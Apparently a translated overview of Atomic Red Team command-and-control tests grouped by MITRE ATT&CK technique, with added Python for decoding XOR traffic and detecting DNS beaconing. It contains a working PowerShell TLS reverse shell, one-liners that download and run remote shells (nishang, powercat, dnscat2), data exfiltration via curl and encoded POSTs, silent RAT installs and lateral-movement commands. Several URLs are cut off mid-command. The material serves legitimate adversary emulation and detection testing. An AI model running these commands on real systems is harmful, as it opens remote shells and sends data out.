Atomic: Command and Control Tactics
Overview of specific techniques

Tactic: command-and-control

| ID | Technique |
| --- | --- |
| T1573 | Encrypted Channel |
| T1572 | Protocol Tunneling |
| T1571 | Non-Standard Port |
| T1219 | Remote Access Software |
| T1132.001 | Data Encoding: Standard Encoding |
| T1105 | Ingress Tool Transfer |
| T1095 | Non-Application Layer Protocol |
| T1090.003 | Proxy: Multi-hop Proxy |
| T1090.001 | Proxy: Internal Proxy |
| T1071.004 | Application Layer Protocol: DNS |
| T1071.001 | Application Layer Protocol: Web Protocols |
Host model: Encrypted Channel
1. Establish C2 with OpenSSL
C2: Command and Control

```powershell
# Client side: connect to the OpenSSL listener over TLS and execute what it sends back
$server_ip = '127.0.0.1'
$server_port = 443
$socket = New-Object Net.Sockets.TcpClient($server_ip, $server_port)
$stream = $socket.GetStream()
# The validation callback always returns $True, so any server certificate is accepted
$sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
$sslStream.AuthenticateAsClient('fakedomain.example', $null, "Tls12", $false)
$writer = new-object System.IO.StreamWriter($sslStream)
$writer.Write('PS ' + (pwd).Path + '> ')
$writer.flush()
[byte[]]$bytes = 0..65535|%{0};
while(($i = $sslStream.Read($bytes, 0, $bytes.Length)) -ne 0)
{$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data | Out-String ) 2>&1;
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$sslStream.Write($sendbyte,0,$sendbyte.Length);$sslStream.Flush()}
```

```cmd
sc.exe create artservice binPath= "%COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\art-marker.txt"
```

https://medium.com/walmartglobaltech/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926
https://gist.githubusercontent.com/clr2of8/4786587885a7debc576ab44a32fa5cb7/raw/af5827f3169920035da73bc17bc5ec8465b41c59/c2_client_to_openssl_server.ps1
Host model: Protocol Tunneling
1. High-volume queries over DNS over HTTPS

```powershell
for($i=0; $i -le 1000; $i++) { (Invoke-WebRequest "https:
```

2. Regular beaconing over DNS over HTTPS
Regular beaconing: this test simulates a compromised host sending periodic beacons to a command-and-control server through DoH queries. The behaviour is typical of an implant that is idle and waiting for tasking, or one configured to keep its query volume low over time to evade threshold-based detection.

```powershell
Set-Location C:\AtomicRedTeam\atomics
.\T1572\src\T1572-doh-beacon.ps1 -DohServer https:
```

3. Long-domain queries over DNS over HTTPS

```powershell
Set-Location C:\AtomicRedTeam\atomics
.\T1572\src\T1572-doh-domain-length.ps1 -DohServer https:
```
Host model: Non-Standard Port
1. Testing non-standard port usage with PowerShell

```powershell
Test-NetConnection -ComputerName google.com -port 8081
```

2. Testing non-standard port usage with telnet

```cmd
echo quit | telnet google.com 8081
exit 0
```
Host model: Remote Access Software
1. Detect TeamViewer software on Windows

```powershell
Invoke-WebRequest -OutFile C:\Users\$env:username\Desktop\TeamViewer_Setup.exe https:
$file1 = "C:\Users\" + $env:username + "\Desktop\TeamViewer_Setup.exe"
Start-Process -Wait $file1 /S;
Start-Process 'C:\Program Files (x86)\TeamViewer\TeamViewer.exe'
```

2. Detect AnyDesk software on Windows

```powershell
Invoke-WebRequest -OutFile C:\Users\$env:username\Desktop\AnyDesk.exe https:
$file1 = "C:\Users\" + $env:username + "\Desktop\AnyDesk.exe"
Start-Process $file1 /S;
```

3. Detect LogMeIn software on Windows

```powershell
Invoke-WebRequest -OutFile C:\Users\$env:username\Desktop\LogMeInIgnition.msi https:
$file1 = "C:\Users\" + $env:username + "\Desktop\LogMeInIgnition.msi"
Start-Process -Wait $file1 /quiet;
Start-Process 'C:\Program Files (x86)\LogMeIn Ignition\LMIIgnition.exe' "/S"
```

4. Install GoToAssist software on Windows

```powershell
Invoke-WebRequest -OutFile C:\Users\$env:username\Downloads\GoToAssist.exe "https://launch.getgo.com/launcher2/helper?token=e0-FaCddxmtMoX8_cY4czssnTeGvy83ihp8CLREfvwQshiBW0_RcbdoaEp8IA-Qn8wpbKlpGIflS-39gW6RuWRM-XHwtkRVMLBsp5RSKp-a3PBM-Pb1Fliy73EDgoaxr-q83WtXbLKqD7-u3cfDl9gKsymmhdkTGsXcDXir90NqKj92LsN_KpyYwV06lIxsdRekhNZjNwhkWrBa_hG8RQJqWSGk6tkZLVMuMufmn37eC2Cqqiwq5bCGnH5dYiSUUsklSedRLjh4N46qPYT1bAU0qD25ZPr-Kvf4Kzu9bT02q3Yntj02ZA99TxL2-SKzgryizoopBPg4Ilfo5t78UxKTYeEwo4etQECfkCRvenkTRlIHmowdbd88zz7NiccXnbHJZehgs6_-JSVjQIdPTXZbF9T5z44mi4BQYMtZAS3DE86F0C3D4Tcd7fa5F6Ve8rQWt7pvqFCYyiJAailslxOw0LsGyFokoy65tMF980ReP8zhVcTKYP8s8mhGXihUQJQPNk20Sw&downloadTrigger=restart&renameFile=1"
$file1 = "C:\Users\" + $env:username + "\Downloads\GoToAssist.exe"
Start-Process $file1 /S;
```

5. Install ScreenConnect software on Windows

```powershell
$installer = "C:\Users\$env:username\Downloads\ScreenConnect.msi"
Invoke-WebRequest -OutFile $installer "https://d1kuyuqowve5id.cloudfront.net/ScreenConnect_21.11.4237.7885_Release.msi"
msiexec /i $installer /qn
```

6. Install Ammyy Admin software on Windows

```powershell
Start-Process $env:temp\ammyy.exe
```

7. Install RemotePC software on Windows

```powershell
Start-Process $env:temp\RemotePC.exe
```

8. Install the NetSupport remote access trojan (RAT) software on Windows

```powershell
Start-Process $env:temp\T1219_NetSupport.exe -ArgumentList "/S /v/qn"
```

9. Install UltraViewer software on Windows

```powershell
Start-Process -Wait -FilePath "$env:temp\T1219_UltraViewer.exe" -Argument "/silent" -PassThru
Start-Process 'C:\Program Files (x86)\UltraViewer\UltraViewer_Desktop.exe'
```

10. Install UltraVNC software on Windows

```powershell
Start-Process $env:ProgramFiles\'uvnc bvba\UltraVnc\vncviewer.exe'
```

11. Install MSP360 software on Windows

```powershell
Start-Process $env:ProgramFiles\Connect\Connect.exe
```
Host model: Data Encoding: Standard Encoding
1. Encode data with Base64

```bash
echo -n 111-11-1111 | base64
curl -XPOST MTExLTExLTExMTE=.redcanary.com
```

2. Encode data with XOR

```powershell
# PowerShell does not treat "\n" as an escape, so the backslashes below are literal
$plaintext = ([system.Text.Encoding]::UTF8.getBytes("Path\n----\nC:\Users\victim\"))
$key = "abcdefghijklmnopqrstuvwxyz123456"
$cyphertext = @();
# XOR each plaintext byte with the key byte at the same position, repeating the key
for ($i = 0; $i -lt $plaintext.Count; $i++) { $cyphertext += $plaintext[$i] -bxor $key[$i % $key.Length]; }
$cyphertext = [system.Text.Encoding]::UTF8.getString($cyphertext)
[System.Net.ServicePointManager]::Expect100Continue = $false
Invoke-WebRequest -Uri example.com -Method POST -Body $cyphertext -DisableKeepAlive
```
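Analyst-side view of the XOR test above, as an added Python example (not code from the page or from Atomic Red Team): it reproduces the test's repeating-key XOR, shows that the same operation decodes a captured body, and recovers key bytes where the plaintext is predictable. The key and plaintext are the test's own; the captured POST body is constructed here by running that XOR.

```python
"""Repeating-key XOR as used by the T1132.001 test, seen from the analyst's side.

Added example, not code from the original page or from Atomic Red Team. The
plaintext and key are the ones the test uses; the captured POST body is
constructed here by running the same XOR.
"""

KEY = b"abcdefghijklmnopqrstuvwxyz123456"
# PowerShell does not treat "\n" as an escape, so the test's plaintext keeps literal backslashes.
PLAINTEXT = b"Path\\n----\\nC:\\Users\\victim\\"


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """XOR each byte with the key byte at the same position modulo the key length.

    The operation is its own inverse, so this both encodes and decodes.
    """
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_key_prefix(ciphertext: bytes, known_prefix: bytes) -> bytes:
    """Recover the first len(known_prefix) key bytes from a known plaintext prefix.

    Repeating-key XOR leaks the key wherever the plaintext is predictable; the
    test's body always starts with the "Path\\n----\\n" header of the PowerShell output.
    """
    return bytes(c ^ p for c, p in zip(ciphertext, known_prefix))


def decode_capture(ciphertext: bytes, key: bytes) -> str:
    """Decode a captured body with the recovered or known key."""
    return xor_repeating(ciphertext, key).decode("utf-8", errors="replace")


# Constructed capture: what the test would POST to example.com
CAPTURED_BODY = xor_repeating(PLAINTEXT, KEY)

if __name__ == "__main__":
    print("recovered key prefix:", recover_key_prefix(CAPTURED_BODY, b"Path\\n----\\n"))
    print("decoded body:", decode_capture(CAPTURED_BODY, KEY))
```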
Host model: Ingress Tool Transfer
Ingress tool transfer: this can be understood as an attacker bringing tools with upload, download, copy, move or reverse-connection capabilities onto the victim host; the tools used to gain this entry point are what we call ingress tool transfer.
See the following link for the specific test cases:
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md
Indicators extracted from commonly used ingress tools

```
rsync scp sftp

(certutil -urlcache)

(certutil -verifyctl)

(bitsadmin.exe /transfer)

(New-Object System.Net.WebClient).DownloadFile("#{remote_file}", "#{destination_path}")

cd "%ProgramData%\Microsoft\Windows Defender\platform\4.18*"
MpCmdRun.exe -DownloadFile -url #{remote_file} -path #{local_path}

timeout --preserve-status 1 whois -h localhost -p 443 "Hello from Atomic Red Team test T1105" > /tmp/T1105.whois.out

(New-Object Net.WebClient).DownloadString('#{target_remote_file}') | Out-File #{output_file}; Invoke-Item #{output_file}

finger base64_filedata@#{remote_host}

$imewdbled = $env:SystemRoot + "\System32\IME\SHARED\IMEWDBLD.exe"
& $imewdbled #{remote_url}
```

Download:

```
curl -k url -o c:\users\public\music\allthethingsx64.dll
curl -k url --output c:\users\public\music\allthethingsx64.dll
curl -k url -o c:\programdata\allthethingsx64.dll
curl -k url -o %Temp%\allthethingsx64.dll
```

Upload:

```
curl -T c:\temp\atomictestfile.txt www.example.com
curl --upload-file c:\temp\atomictestfile.txt www.example.com
curl -d c:\temp\atomictestfile.txt www.example.com
curl --data c:\temp\atomictestfile.txt www.example.com
```

```
https:

$machine_list = "$env:temp\T1105MachineList.txt"
$offline_list = "$env:temp\T1105OfflineHosts.txt"
$completed_list = "$env:temp\T1105CompletedHosts.txt"
foreach ($machine in get-content -path "$machine_list")
{if (test-connection -Count 1 -computername $machine -quiet)
{cmd /c copy "#{binary_file}" "\\$machine\#{remote_drive_letter}$#{exe_remote_folder}"
echo $machine >> "$completed_list"
wmic /node: "$machine" process call create "regsvr32.exe /i #{remote_drive_letter}:#{exe_remote_folder}"}
else
{echo $machine >> "$offline_list"}}

replace.exe

certreq.exe -Post -config https:

wscript.exe PathToAtomicsFolder\T1105\src\T1105-download-file.vbs

curl -sO https:
| bash atomic.sh

nimgrab.exe

powershell.exe iwr -URI https:
```

Host model: Non-Application Layer Protocol
1. ICMP C2

```powershell
IEX (New-Object System.Net.WebClient).Downloadstring('https://raw.githubusercontent.com/samratashok/nishang/c75da7f91fcc356f846e09eab0cfd7f296ebf746/Shells/Invoke-PowerShellIcmp.ps1')
Invoke-PowerShellIcmp -IPAddress 127.0.0.1
```

2. Netcat C2

```powershell
cmd /c $env:TEMP\T1095\nmap-7.80\ncat.exe 127.0.0.1 80
```

3. Powercat C2

```powershell
IEX (New-Object System.Net.Webclient).Downloadstring('https://raw.githubusercontent.com/besimorhino/powercat/ff755efeb2abc3f02fa0640cd01b87c4a59d6bb5/powercat.ps1')
powercat -c 127.0.0.1 -p 80
```
Host model: Proxy: Multi-hop Proxy
1. Psiphon

```cmd
PathToAtomicsFolder\T1090.003\src\Psiphon.bat
```

Indicator: psiphon3.exe

https:

2. Tor Proxy Usage - Windows

```powershell
invoke-expression 'cmd /c start powershell -Command {cmd /c $env:temp\tor\Tor\tor.exe}'
sleep -s 60
stop-process -name "tor" | out-null
```

https:

3. Tor Proxy Usage - Debian/Ubuntu

```bash
sudo systemctl start tor

sudo apt-get -y install tor
```

4. Tor Proxy Usage - MacOS

```bash
osascript -e 'tell application "Terminal" to do script "tor"'

if [ ! -x "$(command -v brew --version)" ]; then /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"; fi
brew install tor
```
Host model: Proxy: Internal Proxy
1. Connection Proxy

```bash
export http_proxy=127.0.0.1:8080

unset http_proxy
unset https_proxy
```

2. Connection Proxy for macOS UI

```bash
networksetup -setwebproxy Wi-Fi 127.0.0.1 8080
networksetup -setsecurewebproxy Wi-Fi 127.0.0.1 8080

networksetup -setwebproxystate Wi-Fi off
networksetup -setsecurewebproxystate Wi-Fi off
```

3. portproxy reg key

```powershell
netsh interface portproxy add v4tov4 listenport=1337 connectport=1337 connectaddress=127.0.0.1

netsh interface portproxy delete v4tov4 listenport=1337 -ErrorAction Ignore | Out-Null
```
Host model: Application Layer Protocol: DNS
1. High-volume DNS queries

```powershell
for($i=0; $i -le 1000; $i++) { Resolve-DnsName -type "TXT" "atomicredteam.$(Get-Random -Minimum 1 -Maximum 999999).127.0.0.1.xip.io" -QuickTimeout}
```

2. Regular DNS beaconing

```powershell
Set-Location C:\AtomicRedTeam\atomics
.\T1071.004\src\T1071-dns-beacon.ps1 -Domain 127.0.0.1.xip.io -Subdomain atomicredteam -QueryType TXT -C2Interval 30 -C2Jitter 20 -RunTime 30
```

3. Long-domain DNS queries

```powershell
Set-Location C:\AtomicRedTeam\atomics
.\T1071.004\src\T1071-dns-domain-length.ps1 -Domain 127.0.0.1.xip.io -Subdomain atomicredteamatomicredteamatomicredteamatomicredteamatomicredte -QueryType TXT
```

4. DNS C2

```powershell
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1')
Start-Dnscat2 -Domain example.com -DNSServer 127.0.0.1
```
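Detection-side counterpart to the beacon and long-domain tests above (items 2 and 3 here, and the DoH beacon test under Protocol Tunneling), as an added Python example that is not code from the page or from Atomic Red Team: it flags clients whose queries to one zone arrive at low-jitter regular intervals and queries carrying an over-long label. The query-log format, the 0.3 coefficient-of-variation threshold and the 50-character label threshold are assumptions chosen for illustration.

```python
# Beacon-timing and label-length checks over a constructed DNS query log. Added
# example, not code from the page or Atomic Red Team; format and thresholds are assumptions.
import statistics
from collections import defaultdict
from datetime import datetime
# Constructed sample, "<ISO time> <client> <qname>" per line. 10.0.0.5 mimics the
# T1071-dns-beacon test (-C2Interval 30 -C2Jitter 20); the last line carries the
# 63-character label used by the T1071-dns-domain-length test.
SAMPLE_LOG = """\
2024-01-01T10:00:00 10.0.0.5 atomicredteam.4512.127.0.0.1.xip.io
2024-01-01T10:00:33 10.0.0.5 atomicredteam.99172.127.0.0.1.xip.io
2024-01-01T10:01:01 10.0.0.5 atomicredteam.7.127.0.0.1.xip.io
2024-01-01T10:01:27 10.0.0.5 atomicredteam.65021.127.0.0.1.xip.io
2024-01-01T10:01:58 10.0.0.5 atomicredteam.3310.127.0.0.1.xip.io
2024-01-01T10:00:02 10.0.0.9 www.example.com
2024-01-01T10:00:03 10.0.0.9 cdn.example.com
2024-01-01T10:07:40 10.0.0.9 mail.example.com
2024-01-01T10:07:41 10.0.0.9 www.example.com
2024-01-01T10:09:16 10.0.0.9 atomicredteamatomicredteamatomicredteamatomicredteamatomicredte.127.0.0.1.xip.io
"""

def parse_log(text):
    """Parse log lines into (timestamp, client, qname) tuples."""
    rows = [line.split() for line in text.splitlines()]
    return [(datetime.fromisoformat(t), c, q.rstrip(".").lower()) for t, c, q in rows]

def beacon_candidates(records, min_queries=4, max_cv=0.3):
    """Return {(client, zone): (mean_gap_s, cv)} where timing of queries to a zone is regular.

    CV is stdev/mean of the inter-query gaps; 30 s with 20 % jitter gives roughly 0.12.
    The zone is the last two labels (a public-suffix list would be used in practice)."""
    stamps = defaultdict(list)
    for ts, client, qname in records:
        stamps[(client, ".".join(qname.split(".")[-2:]))].append(ts)
    hits = {}
    for key, times in stamps.items():
        if len(times) < min_queries:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.stdev(gaps) / mean if mean else float("inf")
        if cv <= max_cv:
            hits[key] = (mean, cv)
    return hits

def long_label_queries(records, max_label=50):
    """Return qnames with a label longer than max_label (RFC 1035 caps labels at 63)."""
    return [q for _, _, q in records if max(len(lab) for lab in q.split(".")) > max_label]
```

A real deployment would read the resolver or DoH proxy log instead of SAMPLE_LOG and tune the thresholds against the organisation's baseline traffic.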
Host model: Application Layer Protocol: Web Protocols
1. Send a malicious User-Agent with PowerShell

```powershell
Invoke-WebRequest www.google.com -UserAgent "HttpBrowser/1.0" | out-null
Invoke-WebRequest www.google.com -UserAgent "Wget/1.9+cvs-stable (Red Hat modified)" | out-null
Invoke-WebRequest www.google.com -UserAgent "Opera/8.81 (Windows NT 6.0; U; en)" | out-null
Invoke-WebRequest www.google.com -UserAgent "*<|>*" | out-null
```

2. Send a malicious User-Agent with CMD

```cmd
curl -s -A "HttpBrowser/1.0" -m3 www.google.com >nul 2>&1
curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 www.google.com >nul 2>&1
curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 www.google.com >nul 2>&1
curl -s -A "*<|>*" -m3 www.google.com >nul 2>&1
```

3. Send a malicious User-Agent on Linux

```bash
curl -s -A "HttpBrowser/1.0" -m3 www.google.com
curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 www.google.com
curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 www.google.com
curl -s -A "*<|>*" -m3 www.google.com
```